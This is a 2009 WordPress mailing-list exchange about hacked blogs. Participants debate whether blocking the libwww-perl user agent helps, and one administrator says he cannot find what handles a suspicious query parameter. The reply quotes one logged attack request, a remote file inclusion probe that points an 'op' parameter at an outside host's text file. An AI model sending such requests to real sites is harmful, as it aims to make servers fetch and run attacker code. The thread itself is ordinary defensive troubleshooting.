[wp-hackers] Hacked blogs

Joost de Valk joost at yoast.com
Thu Mar 26 15:44:01 GMT 2009


Chris Jean wrote:
> I'd just like to remind everyone that it is trivially-simply to change 
> the user agent string in libwww-perl. So, blocking that user agent 
> does nothing to stop people who use randomly-generated user agents 
> with their attack scripts while it does block people who create and 
> use innocuous scripts for whatever reason.
>
> The problem here isn't libwww-perl (or any other user agent for that 
> matter); rather, it is whatever hole is being exploited. If we all 
> just block the libww-perl user agent and pat ourselves on the back for 
> a job well done, we'll be overrun when the exploiters simply change or 
> randomize their user agent string.
>
> As for the matter at hand, I'll be very interested to hear more 
> details on the situation Joost. Have you found any leads on what is 
> handling that op query string request?
>
>
Nope, can't find a bloody thing yet. These kind of requests:

GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1

in all the logs, but grepping through the entire htdocs dir, nothing 
that responds to them.



More information about the wp-hackers mailing list